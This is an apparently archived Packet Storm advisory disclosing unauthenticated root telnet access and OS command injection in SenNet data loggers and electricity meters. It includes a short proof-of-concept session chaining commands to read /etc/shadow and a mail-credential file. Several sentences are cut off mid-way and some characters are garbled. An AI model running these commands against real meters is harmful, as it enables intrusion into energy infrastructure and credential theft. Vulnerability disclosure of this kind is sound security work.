SenNet Data Logger / Electricity Meter Code Execution

Type packetstorm
Reporter Karn Ganeshen
Modified 2017-04-06T00:00:00


                                            `SenNet Data Logger appliances and Electricity Meters Multiple  
Note: Vendor has released the fix. Details to be documented in ICS-CERT  
SenNet is a trademark of Satel Spain that offers monitoring and  
remote-control solutions for businesses. Our engineers develop, integrate  
and test the products of SenNet in our facilities in Madrid (Spain).  
Vulnerable products  
SenNet Optimal DataLogger appliance  
SenNet Solar DataLogger appliance  
SenNet Multitask Meter  
Deployment Geography  
Americas and Europe regions  
Target Audience / Industry  
Energy, Power, Service Providers, Telecom  
Note: all appliances seem to be running on the same code base, and  
therefore, all SenNet models, and software versions stand vulnerable.  
Appliances Confirmed affected:  
SenNet Solar  
Datalogger Model: OWA3X  
Serial Number: A04WCJ  
Licence type: A02  
Version: V5.03-1.56a  
SenNet Optimal  
Datalogger Model: OWA31  
Serial Number: A05B89  
License type: A02  
Version: V5.37c-1.43c  
SenNet Multitask Meter  
Datalogger Model: OWA3X  
Serial Number: A04ZZ3  
Licence type: A02  
Version: V5.21a-1.18b  
SenNet Optimal is a monitoring solution to meter consumption (electricity,  
gas, water) and other variables (temperature, humidity, presence, lighting  
a|); both for industries and for businesses in the tertiary sector.  
SenNet Solar is a solution for monitoring. It is suitable for any kind of  
power generation plants. In this type of facilities, it is essential to  
monitor and remotely control the devices involved in the process:  
inverters, meters, trackers, etc.  
SenNet Meter is an ideal device for electricity submetering.  
Vulnerability Details  
1. No access control on the remote shell  
The appliance runs ARM as underlying OS. Telnet access is enabled on TCP  
port 5000. There is no authentication required for accessing and connecting  
the remote shell. Any user can connect to the shell and issue commands.  
2. Shell services running with excessive privileges (superuser)  
The service runs with superuser root privileges, thus giving privileged  
access to any user, without any authentication (exploited via OS Command  
Injection described nexe).  
3. OS Command Injection  
The remote shell (attempts to) offer a restricted environment, and does not  
allow executing system commands. However, it is possible to break out of  
this jailed shell by chaining specific shell meta-characters and OS  
The service / application is run as 'root' and OS command injection results  
in full system access.  
Apart from energy logging data, the device stores sensitive information  
such FTP, SMTP and other service login credentials, used by the application  
for functions, as well as to connect with other external, public facing  
# telnet IP 5000 2>/dev/null  
Trying IP...  
Connected to IP.  
Escape character is '^A'.  
$ true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf;  
/bin/sh: $: not found  
uid=0(root) gid=0(root)  
1 root 2412 S init  
2 root 0 SW AkthreaddA  
3 root 0 SW Aksoftirqd/0A  
4. Insecure Transport - all communications are clear-text, and prone to  
Metasploit module will be released shortly.